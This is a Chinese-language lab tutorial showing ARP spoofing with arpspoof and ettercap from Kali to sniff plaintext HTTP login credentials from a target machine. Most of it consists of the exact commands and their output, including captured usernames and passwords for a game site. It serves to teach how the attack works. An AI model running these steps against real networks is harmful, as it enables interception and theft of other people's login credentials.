Ettercap ARP欺骗用户名密码抓取

如何通过 kali 获取网页登陆的用户名和密码

准备好kali与靶机

• 1.在终端输入

  echo 1 >/proc/sys/net/ipv4/ip_forward
  

  设置网卡工作状态，保证发动arp攻击时不会导致断网，该命令无回显

• 2.可以用cat命令查看是否设置成功

  cat /proc/sys/net/ipv4/ip_forward
  
  1
  

  回显为 ‘1’ 表示设置成功

• 3.发动arp攻击，成功后即可停止

  arpspoof -i eth0 -t 192.168.43.176 192.168.43.1
  
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 0:c:29:d4:f5:ff
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 0:c:29:d4:f5:ff
  ^CCleaning up and re-arping targets...
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
  0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
  

  arpspoof -i 网卡 -t 目标IP 网关

• 4.使kali进入随时获取状态

  ettercap -Tq -i eth0
  
  ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
  
  Listening on:
    eth0 -> 00:0C:29:D4:F5:FF
        192.168.43.80/255.255.255.0
        fe80::20c:29ff:fed4:f5ff/64
  
  SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
  Privileges dropped to EUID 65534 EGID 65534...
  
   33 plugins
   42 protocol dissectors
   57 ports monitored
  20388 mac vendor fingerprint
  1766 tcp OS fingerprint
  2182 known services
  Lua: no scripts were specified, not starting up!
  
  Randomizing 255 hosts for scanning...
  Scanning the whole netmask for 255 hosts...
  * |==================================================>| 100.00 %
  
  3 hosts added to the hosts list...
  Starting Unified sniffing...
  

    Text only Interface activated...
    Hit 'h' for inline help

##### ettercap -Tq -i eth0  中T为启动文本模式，q为安静模式

• 5.使用靶机访问含有登陆界面的网页,我以7k7k小游戏为例,自动在命令行下产生如下

  HTTP : 115.182.59.143:80 -> USER: 星光灿烂  PASS: 123456  INFO: http://zc.7k7k.com/minilogin?callback=hdcallback_1500614556030
  CONTENT: username=%E6%98%9F%E5%85%89%E7%81%BF%E7%83%82&password=123456&autologin=checked&rf=http%3A%2F%2Fwww.7k7k.com%2F%3Fdaohangqq1%23bottom
  
  HTTP : 115.182.59.143:80 -> USER: test  PASS: 123456  INFO: http://zc.7k7k.com/minilogin?callback=hdcallback_1500614556030
  CONTENT: username=test&password=123456&autologin=checked&rf=http%3A%2F%2Fwww.7k7k.com%2F%3Fdaohangqq1%23bottom
  

  以上两条本质上没有什么区别,但是当使用中文用户名的时候,产生的

  username=%E6%98%9F%E5%85%89%E7%81%BF%E7%83%82

  而不是 USER: 星光灿烂 这串代码用URL解码之后就是对应的汉字,在线解码即可